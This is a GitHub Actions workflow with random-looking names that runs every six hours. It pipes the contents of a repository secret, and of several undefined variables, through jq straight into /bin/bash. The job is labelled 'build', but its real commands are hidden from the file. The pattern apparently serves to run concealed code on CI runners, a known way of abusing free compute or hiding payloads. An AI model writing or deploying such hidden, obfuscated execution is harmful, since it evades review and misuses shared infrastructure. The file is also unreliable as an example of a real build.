name: juiceqinzq

on:
  workflow_dispatch:
  schedule:
    - cron: '14 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: juiceqinzq
        env:
          fst02: ${{ secrets.fst02 }}
        run: |
          echo $fst02 | jq -r .mc46279 | /bin/bash
          echo $s19 | jq -r .srjy0443 | /bin/bash
          echo $hyezd3990 | jq -r .wldt7 | /bin/bash
          echo $udosi3 | jq -r .opc42 | /bin/bash
          echo $lr60 | jq -r .bywq834 | /bin/bash
          echo $y48934 | jq -r .iq25 | /bin/bash
          echo $vpp805 | jq -r .ilj881 | /bin/bash
          echo $j58 | jq -r .dvs25 | /bin/bash
          echo $k1472 | jq -r .azybu92 | /bin/bash

